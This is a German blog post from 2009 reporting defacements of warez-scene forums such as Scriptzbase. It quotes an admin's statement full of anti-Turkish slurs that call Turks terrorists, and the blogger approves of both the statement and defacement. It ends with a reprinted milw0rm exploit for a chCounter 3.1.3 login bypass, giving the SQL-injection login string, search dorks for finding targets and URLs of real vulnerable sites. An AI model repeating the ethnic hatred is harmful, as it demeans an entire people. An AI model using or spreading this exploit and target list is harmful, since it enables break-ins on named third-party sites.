Quasi owned..

.. wuerde hoohead nun sagen 😀

Gestern am 17.04.2009 war anscheinend einiges los. Scriptload wurde “im namen von The Don” (ein Admin aus scriptzbase.org) defaced. War er natuerlich nicht, wie man sehen kann. Sowas wuerde er nie schreiben.

–>

Quelle & mehr: http://newsbox.cc/hacked-ddosed-defaced/scriptload-gehackt/

Dann folgte wieder eine Seite, diesmal undergroundimagez ein Projekt von The Don.

–>

Quelle & mehr: http://newsbox.cc/hacked-ddosed-defaced/undergroundimagez-gehackt/

Und da alle guten Dinge 3 sind, hat es danach nochmal eine große Seite getroffen, naemlich Scriptzbase.org – Admins sind dort Pyth@n und The Don.

Hier nochmal zuerst das kleine Statement:

Leider wurden wir die Nacht Opfer eines Hack-Angriffs
Wir bleiben nun doch erstmal Offlin bis zur klärung
Dann erstmal sehen wie es weiter geht und ob es überhaupt weiter geht

Fuck of Türke

Es ist doch immer wieder schade wie sich die scheiß Szene selber wenichten tut, Kinder übernehmen die Szene immer mehr

Scriptzbase.org hat nicht mit dem hack-Angriff auf Scriptload zu tun.

Und dann das etwas groessere:

Mehr pech kann man glaubich nicht haben, erst läuft alles schief bezüglich des Umzugs.
Dateiload nimmt unseren root vom Netz, ohne uns den neuen zur verfügung zu stellen, dann sollen wir 1 1/2 – 2 Wochen warten,
bis der neue da ist. Darauf hatten wir aber kein bock, The Don hat stress geschoben, da wir ein reibunglosen Umzug haben wollten.
Dann stellte Dateiload uns den ALTEN wieder hin. Wegen dem Stress nahm man uns den Account Manager (zurecht), jetzt sollen wir den jetztigen root kündigen bevor wir den neuen bekommen *lol*.

In der Nacht zum 17.02 wurde ScriptzBase Opfer eines Hack-Angriffes, wie dies passiert ist, wissen wir selber noch nicht!.
Fest steht, es waren wie immer diese kleine mießen Türken. Diese Kündigen an ein Backup Online zu stellen.

Auch Speedtest von 1337-Crew versuchte uns zu Hacken, durch eine Lücke in VB trug er eine E-Mail adresse in die Administratoren Accounts ein, die damals noch zur seiner Seite heihachi.net führte.
vermutlich weil ich heihachi.net als inkompetenter Hoster bezeichnete und diesen Hoster auf ScriptzBase Zensur.
Wo ich mit Account-Shop drauf gehostet habe, war meine Seite mehr down als alles andere. Hosting ist kein Kuchenbacken.

Wie es jetzt weiter geht weiß ich noch nicht, ich habe ehrlich keine lust mehr auf ScriptzBase.
Wir stellen User vieles KOSTENLOS zur verfügung, geben monatlich viel Geld für den scheiß root aus, seid es ScriptzBase gibt habe ich schon über 3000€ dafür aus gegeben.
Wozu dies alles?, für diese scheiß Szene, die nur nimmt und nichts gibt, für User die auf ScriptzBase aktiv leechen, aber Scriptzbase hassen tun, und alles daran setzen uns zu schaden, uns mit Füßen Größe 52 treten!.

Aber Ihr habt ja noch eure Englischen freunde, die Deutsche Szene wird immer mehr verschwinden, und das nur wegen dummen Leuten,
die meinen, sich beweisen zu müssen und mehr schaden anrichten als sie gutes tun.
Solche dummen Menschen werden dann auch noch bejubelt wie (Saddam Hussein) der alles in namen Allah tut!*Lach*,
damit diese sich freuen können.
Die Türkischen hacker denken Sie tuen alles für Allah, denken wenn sie Terror laufen, Seiten hacken das diese gutes tun *Pfff*.
Sobald man eine Türkische Seite hacken tut, laufen diese Terror und töten Menschen, wir Deutschen essen doch lieber Kartoffeln!
Türken schaden mehr das Internet als jedes andere Volk, sie verstehen nicht wofür Gemeindschaft steht, Freude, Spass, Freundschaft.

Bald wird es bestimmt noch eine Deutsche Script Seite geben, die aber auch schnell offline geht *lach*
Ist das schön wenn dumme leute sich selber ins Bein schießen, das auch noch toll finden.

Mein motto war immer “Hack niemals Szene Seiten, es sei denn die sachden dich selber massiv” vTeam-Germany wurde damals von mir gehackt, weil dies zutraf, nicht OHNE grund.

Leute mögen mich “PyTh@n” nicht weil die mich nicht kennen, Sie Urteilen über mich einfach, erzählen scheiße, machen mit meinen Nick irgend eine scheiße auf andere Seiten. Und jetzt kommen die ganzen Kinder aus den löchern die meinen etwas über SB zu wissen, erzählen irgend eine scheiße, wissen nichtmal was diese damit selber bezwecken wollen.

Ich werde die nächsten Tage darüber nachdenken, ob es sich noch lohnt die ganze scheiße für Leute zu machen die dich doch eigl hassen, die dir schaden wollen!.
Ob sich das lohnt, Monat für Monat gedanken zu machen woher ich das Geld für den root nehme.
Ob sich das Lohnt evtl meine zukunft durch Warez zu versauen.
Ob sich der ganze Stress und ärger Lohnt!.

In dem ScriptzBase Backup stehen IP-Adresse der User drinne, es ging einfach nicht mehr ohne logging, die User haben zu viel scheiße gebaut, wollten schaden anrichten.
Auch wenn wir auf Sicherheit der User achteten mussten wir auch selber auf Unsere achten, IP logging wollten wir nach dem Umzug Temporary machen, dazu kam es aber leider nicht mehr.
Uns war immer klar das das BKA niemals an unseren root kommen würde, wenn dann wäre alles ganz schnell weg;)
User müssen aber keine Angst haben vor Besuch des BKA;), wer sich gedanken macht, macht sich lächerlich;).

Auf diesen wegen Sorry für das Loggen, in der Szene geht es leider nicht mehr OHNE. 1337 macht es selber nicht anderes!.

Wie gesagt wir wissen nicht ob es überhaupt weiter geht, ich werde die Tage darüber nach denken.
Ich werde nur auf Diskussionen im Newsbox.cc Forum antworten.

Die ScriptzBase Administration
PyTh@n

E-Mail: [email protected]

PS: ScriptzBase wäre die Tage 2 Jahre geworden!

Quelle: http://scriptzbase.org/

Ich stimme der Aussage von Pyth@n voll und ganz zu und ich denke er hat mit seinem Statement auch recht. Es gibt nur eine positive Sache zu sagen “defaces” sind wenigsten was anderes als langweiliger Dauer DDoS. Deface zeigt naemlich immerhin etwas koennen, was man bei DDoS nicht behaupten kann.

Aufjedenfall hoff ich, dass sich die Admins von Scriptzbase schnell erholen und am Projekt weitermachen.. Scriptzbase war nen tolles Forum. 🙂

Was gibts sonst noch interessantes zu berichten.. ah -tmh- hat mal wieder nen Exploit auf milw0rm veroeffentlicht, es handelt sich mal wieder um einen Login Bypass, sehr gefaehrlich das ganze, da man innerhalb von sekunden und ohne große Anstrengung zum Admin werden kann:

########################################################################################################################
#chCounter 3.1.3 Login Bypass
#=======================================================================================================================
#
#Critical Level : Dangerous
#
#Vendor site : http://chcounter.org/
#
#Download : http://chcounter.org/chCounter3/getfile.php?id=5
#
#dorks: "chCounter 3.1.3" Künftig automatisch einloggen or "chCounter 3.1.3"
#
#=======================================================================================================================
#
#
#Information :
#--------------------------------
#Need: magic quotes = off
#
#Exploit :
#--------------------------------
#
#http://www.[URL]//counter/stats/index.php
#
#Use or '=' as username and password
#
#
#Live demo :
#--------------------------------
#
#http://www.brummelliese.de/count/stats/
#http://www.fire.uni-freiburg.de/counter/welcome/stats/
#
#=======================================================================================================================
#Discovered by : -tmh- & Lainux
#
#Contact : tmh[at]sys-flaw.com
#
#Greetz to : n00bor , activebeta, Five-Three-Nine ,GabberGandalf, J0hn.X3r , electron1x , Lainux, PurpleD1amond , Sebo , Z1uX , meckl , Floo , -Patrick_B ,
#abcdef ,Loader007 , bizzit , Barbers , dev0815 , f0Gx , h0yt3r , Nemo , eddy14 , Sys-Flaw , Codesoft ,Free-Hack
#
#
########################################################################################################################

# milw0rm.com [2009-04-16]

Quelle: http://www.milw0rm.com/exploits/8461

Danke nochmal fuer das Erwaehnen in den Greetz 🙂

Was gibts noch aktuelles zu sagen? Vorerst nichts, wird jedoch heute noch etwas folgen 🙂